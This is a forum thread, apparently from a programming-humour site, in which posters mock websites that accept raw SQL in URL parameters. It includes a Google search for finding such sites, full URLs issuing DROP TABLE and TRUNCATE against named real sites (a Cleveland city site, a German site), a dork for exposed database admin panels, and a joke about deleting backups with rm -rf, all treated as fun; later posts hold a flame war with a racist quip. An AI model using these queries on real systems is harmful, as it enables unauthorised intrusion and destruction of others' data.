The following Google query returns some fantastic results (thousands of them):

 inurl:select inurl:where inurl:%20

Not that I tried, of course.

I especially didn't try on the United Nations homepage.

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this operation on table 'Restaurantes'.

/Gastronomia/RestaurantesI.asp, line 204

 Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.

  http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120 turned into

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport

Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.

WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.

The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

You've got to be kidding me.

Stumbled onto this gem too..

http://cd.city.cleveland.oh.us/scripts/LandbankReports.05232007 

You know, I thought you must be joking or something at first, until I went to that site myself and did a search on all records, and it didn't turn up anything. Wow.

Way to go, random Cleveland site.  You have the worst security I've seen in my life, and have just paid for it.  Do a better job next time.

Bladezor:

The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

The lowest bidder. Enough said.

Ok, I did what I could to "restore" their database.

Recreate the table:

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&sql_query=CREATE TABLE landbank.cityport (Ward TEXT NOT NULL, PPN TEXT NOT NULL ,Street_Number TEXT NOT NULL, Street_Name TEXT NOT NULL, Frontage_of_Parcel TEXT NOT NULL, Depth_of_Parcel TEXT NOT NULL, Sqfeet TEXT NOT NULL, Buildescr TEXT NOT NULL)

Populate it:

http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("18","00515009","3091","W%20106TH%20ST","25","105","2625","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01919053","0","WANDA%20AVE","40","112","4480","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917012","0","BELLAIRE%20RD","64","65","4160","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917011","0","BELLAIRE%20RD","40","99","3960","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916150","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916149","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826053","0","BROOKLAWN%20AVE","297","73","21681","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826052","0","BROOKLAWN%20AVE","71","52","3692","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225081","0","VICTORY%20BLVD","61","89","5429","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225080","0","VICTORY%20BLVD","62","110","6820","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225079","0","VICTORY%20BLVD","68","119","8092","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225034","0","W%20140%20ST","21","232","4872","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225078","0","VICTORY%20BLVD","60","113","6780","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02010091","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009088","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009087","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009086","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009085","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009084","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009083","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009082","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009081","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009080","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009079","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")

Good enough..?

http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

You can abuse this to show more records, but when you try to DROP the table with

http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

you will get:

bobday:

http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

You can abuse this to show more records, but when you try to DROP the table with

http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

you will get: 

It's just searching for some substrings like delete or drop, but it appears security is enforced properly:

http://www.websahara.de/query.php?query=truncate%20table+land

It didn't catch the query, but you get an Access denied for user: 'websahara@localhost' to database 'websahara'

I just noticed this page in the search results:

http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

and now I remember having read about that site in the local newspapers a few days ago. They were reported to have lost records last friday, and the operators restored to the last backup. Shall I help them test their backup/restore procedure once again?  :-) 

 BTW, this is what they report under "Aktuell" == "news":

In der Nacht vom Sonntag, 20. April auf Montag 21. April 2008 wurde sleep-in.ch Opfer eines Hacker-Angriffs.

Dabei wurden alle Angebote der über 2800 Gastgeber und Gäste gezielt gelöscht. Sleep-In konnte mit wenigen Ausnahmen alle Inserate wiederherstellen (Stand Sonntag Morgen). Sleep-In entschuldigt sich bei seinen Gastgeber und Gästen und arbeitet mit Hochdruck daran, dass sich dieser Vorfall nicht wiederholen kann.

Aber natürlich sind wir verärgert und enttäuscht.

Trotzdem: Auf eine gfreute Euro08!

Translates to

During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.

Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

But of course, we are angry and disappointed.

Still: Enjoy a happy Euro08! 

TheRider:

 BTW, this is what they report under "Aktuell" == "news":

During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.

Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

But of course, we are angry and disappointed.

Still: Enjoy a happy Euro08! 

Now, what do we say!

They only do nightly backups, people should delete their records in the evening 

" aah!! h4xx0rs!! "

Bladezor:

hate on cleveland

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

galgorah:

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

I get the feeling that by the end of the day their database is going to be in a sad state of affairs.

Bonus points if someone succeeds in executing rm -rf /var/backup :) 

t-bone:

Bonus points prison rape if someone succeeds in executing rm -rf /var/backup :) 

FTFY.

belgariontheking:

Sig: To fill your mind with knowledge, we must start by emptying it

That's really funny, considering the context of this thread. 

Looks like they took it offline, or someone dropped the database(s)

Xiphonex:

Looks like they took it offline, or someone dropped the database(s)

Bladezor:

Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.

Bladezor:

Ok, I did what I could to "restore" their database.

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

That is the funniest thing I have reaad in ages.  I thank you.

mt

mtill:

That is the funniest thing I have reaad in ages.  I thank you.

I agree!  Never before have I seen someone use SQL injection to actually RESTORE someone's database.  The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash. 

Outlaw Programmer:

...and emptied the trash. 

TheRider:

http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

The Real WTF is that that's correctly indented. Oh, and \r\n newlines.

Carnildo:

Outlaw Programmer:

...and emptied the trash. 

But critical documents were stored there!

 Nice going guys... but they are onto you!

http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678

MasterPlanSoftware:

 Nice going guys... but they are onto you!

http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678

 

rc_pinchey:

Wow, I wouldn't want to be the guy who tried an SQL injection attack on the UN right about now...

*thinks...*

Oh shit.

Meh, the UN has no real power.  "In latest news, the UN security council has voted to send a firmly-worded letter to rc_pinchey for attempting to hack its database." 

SQL Injection is too much work.

I prefer the ease and convenience of:

http://www.google.com/search?q="at+end+of+table"+"next+autoindex"

superjer:

SQL Injection is too much work.

I prefer the ease and convenience of:

http://www.google.com/search?q="at+end+of+table"+"next+autoindex"

superjer:

SQL Injection is too much work.

I prefer the ease and convenience of:

http://www.google.com/search?q="at+end+of+table"+"next+autoindex"

I clicked on  the very first Google result and -- there's a tab labelled "Drop"..   That couldn't possibly do what I think it does -- could it??  I clicked on it,  but just couldn't bring myself to  click on "OK".  All I can say is . . . . OH MY GOD!!!!

Tuuli Mustasydan:

I clicked on  the very first Google result and -- there's a tab labelled "Drop"..   That couldn't possibly do what I think it does -- could it??  I clicked on it,  but just couldn't bring myself to  click on "OK".  All I can say is . . . . OH MY GOD!!!!

You're lying. I can't see any phpmyadmin database there! 

Hypothetically, you could create crafty URL:s, put them on the web somewhere, and let the Google spider do the "real" hacking. Hypothetically.

Outlaw Programmer:

mtill:

That is the funniest thing I have reaad in ages.  I thank you.

 

I agree!  Never before have I seen someone use SQL injection to actually RESTORE someone's database.  The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash. 

Bah. Then They'd only expect us to fix all their problems from now on ...

Update: See also The Spider of Doom, if you forgot that story.

MasterPlanSoftware:

 Nice going guys... but they are onto you!

http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678

 

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

Kyanar:

Bladezor:

Ugh, one of you guys dropped the table again..I'm not fixing it again..

Actually, GoogleBot probably dropped the table for you. Just include the restore query in this thread too, and GoogleBot should get stuck in an infinite loop of destroying and recreating that table until the end of time.

 I don't think GoogleBot would add a table called "ThisIsFun" and a database called "Fubar" right before the whole thing was dropped.

lolwtf:

Even more daily drivel

Thanks for pointing out the obvious!

MasterPlanSoftware:

lolwtf:

Even more daily drivel

 

Thanks for pointing out the obvious!

rc_pinchey:

That seems a little uncalled-for...

Then go read our daily dose of 'lolwtf'. He has decided to post on every thread with nonsense. 

Brilliant posts like "Really'.

So no, not uncalled for.

fbjon:

Flaming is always uncalled for.

I happen to live in a state that allows homosexuals to marry one another?  Do you find that offensive, too?  You're no better than the people who wouldn't allow blacks to vote.  Well, except that blacks probably won't vote the right way.. 

morbiuswilters:

fbjon:

Flaming is always uncalled for.

I happen to live in a state that allows homosexuals to marry one another?  Do you find that offensive, too?  You're no better than the people who wouldn't allow blacks to vote. 

Yeah really, we don't need your kind around here. Take your hate and fear mongering elsewhere please.

rc_pinchey:

MasterPlanSoftware:

lolwtf:

Even more daily drivel

 

Thanks for pointing out the obvious!

Has too much exposure to Swampy turned you into a troll? That seems a little uncalled-for...

lolwtf:

You're only noticing now that he's a troll?

More like an annoying hyperactive child. Just look at his post count. Close to mine, but he wrote almost all of them during the last 6 months. A good troll doesn't post that much. He drops a carefully crafted flamebait now and then and enjoys the fallout.